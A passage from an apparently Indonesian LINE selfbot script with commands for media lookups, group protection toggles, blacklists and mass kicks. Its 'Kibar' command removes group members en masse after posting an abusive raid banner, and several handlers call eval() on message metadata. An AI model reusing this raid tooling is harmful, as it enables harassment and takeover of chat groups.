"body": {
"contents": [
{
"contents": [
{
"url": "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSgekIeIdfny8Bgr-WBIhhZgecUBZKyE89-u_SdB6Z2P-XNPdaVXhrSL1o",
"type": "image"
},
{
"type": "separator",
"color": "#C0C0C0"
},
{
"text": "YOUTUBE\nVIDEOS\nLOADING.\nPLAY",
"size": "sm",
"color": "#000000",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"type": "separator",
"color": "#C0C0C0"
},
{
"contents": [
{
"text": "JUDUL\n " + vid.title + " ?",
"size": "xs",
"align": "center",
"color": "#000000",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
{
"type": "separator",
"color": "#C0C0C0"
},
{
"contents": [
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Author : " + str(vid.author),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
},
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Duration : " + str(vid.duration),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
},
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Likes : " + str(vid.likes),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
},
{
"contents": [
{
"url": "https://media2.giphy.com/media/13Nc3xlO1kGg3S/100.webp?cid=19f5b51a5c7364c358654a44730cc489",
"type": "icon",
"size": "md"
},
{
"text": "Rating : " + str(vid.rating),
"size": "sm",
"margin": "none",
"color": "#6F00FF",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#800000",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "YOUTUBE",
"uri": search_url
}
}]
}]
}
}
}
cl.sendFlex(to, data)
cl.sendVideoWithURL(msg.to, me)
except Exception as e:
sendTextTemplate(msg.to,str(e))
elif text.startswith("Smule "):
if msg._from in admin:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("-")
search = str(count[0])
r = requests.get("https://www.smule.com/"+search+"/performances/json")
data = json.loads(r.text)
if len(count) == 1:
no = 0
ret_ = "DAFTAR OC\n"
for aa in data["list"]:
no += 1
ret_ += "\n" + str(no) + ". " + str(aa["title"])
ret_ += "\n\nSelanjutnya ketik: smule {}-nomor\nuntuk melihat detailnya. ".format(str(search))
sendTextTemplate(msg.to,ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["list"][num - 1]
smule = str(b["web_url"])
c = "Judul Oc: "+str(b["title"])
c += "\nPembuat: "+str(b["owner"]["handle"])
c += "\nTotal like: "+str(b["stats"]["total_loves"])+" like"
c += "\nTotal comment: "+str(b["stats"]["total_comments"])+" comment"
c += "\nStatus VIP: "+str(b["owner"]["is_vip"])
c += "\nStatus Oc: "+str(b["message"])
c += "\nCreated Oc: {}".format(b["created_at"][:10])
c += "\nDidengarkan: {}".format(b["stats"]["total_listens"])+" orang"
hasil = "Detail Record\n\n"+str(c)
dl = str(b["cover_url"])
cl.sendImageWithURL(msg.to,dl)
sendTextTemplate(msg.to, hasil, {'AGENT_NAME': ' URL Smule','AGENT_LINK': 'https://www.smule.com/{}'.format(str(b['owner']['handle'])),'AGENT_ICON': 'https://png.icons8.com/color/50/000000/speaker.png' })
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("https://sing.salon/smule-downloader/?url=https://www.smule.com{}".format(urllib.parse.quote(smule)))
data = BeautifulSoup(r.content, 'html5lib')
get = data.select("a[href*=https://www.smule.com/redir?]")[0]
title = data.findAll('h2')[0].text
imag = data.select("img[src*=https://www.smule.com/redir?]")[0]
if 'Smule.m4a' in get['download']:
sendTextTemplate(msg.to,"Type: Audio\n\nPlease wait for audio...")
cl.sendAudioWithURL(msg.to, get['href'])
else:
sendTextTemplate(msg.to,"Type: Video\n\nPlease wait for video...")
cl.sendVideoWithURL(msg.to, get['href'])
except Exception as e:
sendTextTemplate(msg.to,"DONE BOSS Q")
elif cmd.startswith("musik"):
try:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
r = requests.get("http://api.zicor.ooo/joox.php?song={}".format(str(urllib.parse.quote(urutan))))
data = r.text
data = json.loads(data)
b = data
c = str(b["title"])
d = str(b["singer"])
e = str(b["url"])
g = str(b["image"])
hasil = "Penyanyi: "+str(d)
hasil += "\nJudul : "+str(c)
data = {
"type": "flex",
"altText": "Musik",
"contents": {
"styles": {
"body": {
"backgroundColor": "#0000FF"
},
"footer": {
"backgroundColor": "#7FFF00"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"url": g,
"type": "image"
},
{
"type": "separator",
"color": "#F8F8FF"
},
{
"text": "INEX TEAM\n\nMP3\nSONG ALBUM",
"size": "xs",
"color": "#00FF00",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"type": "separator",
"color": "#FF0000"
},
{
"contents": [
{
"contents": [
{
"text": hasil,
"size": "sm",
"margin": "none",
"color": "#FFFF00",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": g,
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#660000",
"height": "sm",
"action": {
"type": "uri",
"label": "URL",
"uri": e
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "ORDER",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=price"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
cl.sendAudioWithURL(to,e)
except Exception as error:
sendTextTemplate(to, "error\n" + str(error))
logError(error)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Welcome Msg dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Proqr ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Proqr ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect url dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Prokick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Prokick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect kick dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Proinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Proinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect invite dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Projoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Projoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect join dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Procancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Procancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel diaktifkan\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Protect cancel dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
elif 'Pro ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Pro ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah on\nDi Group : " +str(ginfo.name)
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil mengaktifkan semua protect\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Diaktifkan」\n" + msgs)
if spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Berhasil menonaktifkan semua protect\nDi Group : " +str(ginfo.name)
else:
ginfo = cl.getGroup(msg.to)
msgs = "Semua protect sudah off\nDi Group : " +str(ginfo.name)
sendTextTemplate(msg.to, "「Dinonaktifkan」\n" + msgs)
#===========KICKOUT============#
elif ("Kibar" in msg.text):
if msg._from in admin:
if msg.toType == 2:
print ("[ 19 ] KICK ALL MEMBER")
_name = msg.text.replace("Kibar","")
gs = cl.getGroup(msg.to)
sendTextTemplate(msg.to,"ASSALAMUALAIKUM \nHALLOOO!!! \nSORRY ROOM KALIAN \nKEBANYAKAN ANU\nINEXTEAM DATANG\nMAU SAPU ROOM GJ\nNO COMEND \nNO BAPER \nNO BACOT \nNO DESAH \nNO SPONSOR \nNO HATTERS\nROOM OKEP \nROOM JUDI\nROOM GAJELAS\nSIAP KAMI BANTAII \n\n\n\nFUCK YOU...\nKENAPE LU PADA DIEM\nTANGKIS SU JANGAN CUMA NYIMAK\n\n\nDASAR ROOM PEA KAGAK JELAS\nSORRY BOS!!!\nGC LU MAU GUA SITA...!!!\n\n\n SALAM DARI KAMI\n🅸🅽🅴🆇🅱🅾🆃🆂\n\nHADIR DI ROOM ANDA\n\nRATA GAK RATA YANG PENTING KIBAR \nRATA KAMI SENANG\nGAKRATA TUNGGU KEDATANGAN KAMI LAGI\n\n\n SLAM KILERR\n🅸🅽🅴🆇🅱🅾🆃🆂 \n\n\nCREATOR\n\n\nhttps://line.me/R/ti/p/%40bvb1195k\nhttp://line.me/ti/p/~denjaka-inex")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
sendTextTemplate(msg.to,"Limit boss")
else:
for target in targets:
if not target in Bots:
if not target in admin:
if not target in staff:
try:
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except Exception as error:
cl.sendMessage(msg.to, str(error))
elif ("kick " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
cl.sendMessage(msg.to, "")
wait["blacklist"][op.param2] = True
cl.kickoutFromGroup(msg.to, [target])
except:
pass
elif cmd == "refresh" or text.lower() == 'fresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
sendTextTemplate(msg.to,"Berhasil di Refresh...")
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Mentionkick"] = True
sendTextTemplate(msg.to,"Notag diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["MentionKick"] = False
sendTextTemplate(msg.to,"Notag dinonaktifkan")
elif cmd == "contact on" or text.lower() == '.contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
sendTextTemplate(msg.to,"Deteksi contact diaktifkan")
elif cmd == "contact off" or text.lower() == '.contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
sendTextTemplate(msg.to,"Deteksi contact dinonaktifkan")
elif cmd == "r1 on" or text.lower() == 'respon1 on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
sendTextTemplate(msg.to,"Auto respon diaktifkan")
elif cmd == "r1 off" or text.lower() == 'respon1 off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
sendTextTemplate(msg.to,"Auto respon dinonaktifkan")
elif cmd == "r2 on" or text.lower() == 'respon2 on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention2"] = True
sendTextTemplate(msg.to,"Auto respon 2 diaktifkan")
elif cmd == "r2 off" or text.lower() == 'respon2 off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention2"] = False
sendTextTemplate(msg.to,"Auto respon 2 dinonaktifkan")
elif cmd == "pm on" or text.lower() == 'responpm on':
if wait["selfbot"] == True:
if msg._from in owner:
wait["arespon"] = True
sendTextTemplate(msg.to,"Auto respon pm diaktifkan")
elif cmd == "pm off" or text.lower() == 'responpm off':
if wait["selfbot"] == True:
if msg._from in owner:
wait["arespon"] = False
sendTextTemplate(msg.to,"Auto respon pm dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == '.autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
sendTextTemplate(msg.to,"Autojoin diaktifkan")
elif cmd == "autojoin off" or text.lower() == '.autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
sendTextTemplate(msg.to,"Autojoin dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == '.autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
sendTextTemplate(msg.to,"Autoleave diaktifkan")
elif cmd == "autoleave off" or text.lower() == '.autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
sendTextTemplate(msg.to,"Autoleave dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == '.autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
sendTextTemplate(msg.to,"Auto add diaktifkan")
elif cmd == "autoadd off" or text.lower() == '.autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
sendTextTemplate(msg.to,"Auto add dinonaktifkan")
elif cmd == "autoblock on":
if msg._from in admin:
settings["autoBlock"] = True
cl.sendMessage(to, "Berhasil mengaktifkan auto Block")
elif cmd == "autoblock off":
if msg._from in admin:
settings["autoBlock"] = False
cl.sendMessage(to, "Berhasil menonaktifkan auto Block")
elif cmd == "read on" or text.lower() == '.autoread on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = True
sendTextTemplate(msg.to,"Auto add diaktifkan")
elif cmd == "read off" or text.lower() == 'autoread off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoRead"] = False
sendTextTemplate(msg.to,"Auto add dinonaktifkan")
elif cmd == "sticker on" or text.lower() == '.sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = True
sendTextTemplate(msg.to,"Deteksi sticker diaktifkan")
elif cmd == "sticker off" or text.lower() == '.sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["sticker"] = False
sendTextTemplate(msg.to,"Deteksi sticker dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == '.jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = True
sendTextTemplate(msg.to,"Join ticket diaktifkan")
elif cmd == "jointicket off" or text.lower() == '.jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoinTicket"] = False
sendTextTemplate(msg.to,"Autojoin Tiket dinonaktifkan")
elif cmd == "checkpost on":
if msg._from in owner:
settings["checkPost"] = True
sendTextTemplate(to, "Berhasil mengaktifkan check details post")
elif cmd == "checkpost off":
if msg._from in owner:
settings["checkPost"] = False
sendTextTemplate(to, "Berhasil menonaktifkan check details post")
elif cmd == "unsend on":
if msg._from in admin:
if msg.toType == 2:
wait["unsend"] = True
sendTextTemplate(msg.to, "Deteksi Unsend Diaktifkan")
elif cmd == "unsend off":
if msg._from in admin:
if msg.toType == 2:
wait["unsend"] = False
sendTextTemplate(msg.to, "Deteksi Unsend Dinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
sendTextTemplate(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif cmd == "cek":
if msg._from in admin or msg._from in owner:
try:cl.inviteIntoGroup(to, ["u45882d0ead1703855dbc60d40e37bec7"]);has = "OK"
except:has = "NOT"
try:cl.kickoutFromGroup(to, ["u45882d0ead1703855dbc60d40e37bec7"]);has1 = "OK"
except:has1 = "NOT"
try:cl.cancelGroupInvitation(to, ["u45882d0ead1703855dbc60d40e37bec7"]);has2 = "OK"
except:has2 = "NOT"
if has == "OK":sil = "🅱🅰🅳🅰🅽 🆂🅴🅷🅰🆃"
else:sil = "🆃🅾🅻🅾🅽🅶 🅰🅺🆄"
if has1 == "OK":sil1 = "https://2.bp.blogspot.com/-4Yr8ckT8tgs/U_ZiZFWPewI/AAAAAAAACDo/GUcjJOT1lrE/s1600/senamsehat.gif"
else:sil1 = "https://1.bp.blogspot.com/-GhAAjmcghVc/WDQHbLNi7bI/AAAAAAAAAGg/-wIouq5Hu3EEnwdx2jr-DFN9r0Vn5f3IgCLcB/s1600/Infectieziekten%2B%25281%2529.gif"
if has2 == "OK":sil2 = "https://www.isostar.com/share/sport/img_anime_rub/1.gif"
else:sil2 = "https://www.gambaranimasi.org/data/media/511/animasi-bergerak-kubur-0025.gif"
#sendTextTemplate(to, "🄺🄸🄲🄺 : {} \n🄸🄽🅅🄸🅃🄴 : {}".format(sil1,sil))
data = {
"type": "flex",
"altText": "Cek kesehatan",
"contents": {
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#000000"
}
},
"type": "bubble",
"hero": {
"type": "image",
"url": "{}".format(sil1),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
},
"body": {
"contents": [
{
"contents": [
{
"url": "{}".format(sil2),
"type": "image"
},
],
"type": "box",
"spacing": "sm",
"layout": "vertical"
},
{
"type": "separator",
"color": "#ECF0F1"
},
{
"contents": [
{
"text": "{}".format(sil),
"size": "md",
"align": "center",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
}
}
cl.sendFlex(to, data)
elif (".Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
sendTextTemplate(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait[".blacklist"][target] = True
sendTextTemplate(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
sendTextTemplate(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == '.ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
sendTextTemplate(msg.to,"Kirim kontaknya...")
elif cmd == "banlist" or text.lower() == '.cb':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
sendTextTemplate(msg.to,"☠•➤Tidak ada blacklist")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
sendTextTemplate3(msg.to,"☠•➤Blacklist User\n\n"+ma+"\nTotal☠•➤「%s」☠•➤Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == '.talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
sendTextTemplate(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
sendTextTemplate(msg.to,"Talkban User\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "cban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = cl.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
sendTextTemplate(msg.to,"☠•➤Clearr" +mc)
#===========COMMAND SET============#
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
sendTextTemplate(msg.to, "「Welcome Msg」\nWelcome Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set r1: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set r1: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
sendTextTemplate(msg.to, "「Respon Msg」\nRespon1 Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set r2: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set r2: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag2"] = spl
sendTextTemplate(msg.to, "「Respon Msg」\nRespon 2 Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set pm: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pm: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Responpm"] = spl
sendTextTemplate(msg.to, "「Respon Msg」\nRespon Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set autojoin: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set autojoin: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Msg join")
else:
wait["autoJoinMessage"] = spl
sendTextTemplate(msg.to, "「Msg autojoin」\nMsg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Spam")
else:
Setmain["ARmessage1"] = spl
sendTextTemplate(msg.to, "「Spam Msg」\nSpam Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
sendTextTemplate(msg.to, "「Sider Msg」\nSider Msg diganti jadi :\n\n「{}」".format(str(spl)))
elif text.lower() == "cek allrespon":
if msg._from in admin:
sendTextTemplate3(msg.to, "➤☠•Pesan add Msg mu :\n「 " + str(wait["message"])+ "\n\n➤☠•Welcome Msg mu :\n「 " + str(wait["welcome"]) + " 」\n\n➤☠•Respon 1 Msg mu :\n「 " + str(wait["Respontag"]) + " 」\n\n➤☠•Respon 2 Msg mu :\n「 " + str(wait["Respontag2"]) + " 」\n\n➤☠•Respon Msg PM mu :\n「 " + str(wait["Responpm"]) + " 」\n\n➤☠•Sider Msg mu :\n「 " + str(wait["mention"]) + " 」\n\n➤☠•Msg Auto joinmu :\n「 " + str(wait["autoJoinMessage"]) + " 」")
elif text.lower() == "cek pesan":
if msg._from in admin:
sendTextTemplate(msg.to, "「Pesan Msg」\nPesan Msg mu :\n\n「 " + str(wait["message"]) + " 」")
elif text.lower() == "cek welcome":
if msg._from in admin:
sendTextTemplate(msg.to, "「Welcome Msg」\nWelcome Msg mu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek r1":
if msg._from in admin:
sendTextTemplate(msg.to, "「Respon Msg」\nRespon 1 Msg mu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek r2":
if msg._from in admin:
sendTextTemplate(msg.to, "「Respon Msg」\nRespon 2 Msg mu :\n\n「 " + str(wait["Respontag2"]) + " 」")
elif text.lower() == "cek pm":
if msg._from in admin:
sendTextTemplate(msg.to, "「Respon MsgPm」\nRespon Msg PM mu :\n\n「 " + str(wait["Responpm"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
sendTextTemplate(msg.to, "「Spam Msg」\nSpam Msg mu :\n\n「 " + str(Setmain["ARmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
sendTextTemplate(msg.to, "「Sider Msg」\nSider Msg mu :\n\n「 " + str(wait["mention"]) + " 」")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if settings["autoJoinTicket"] == True:
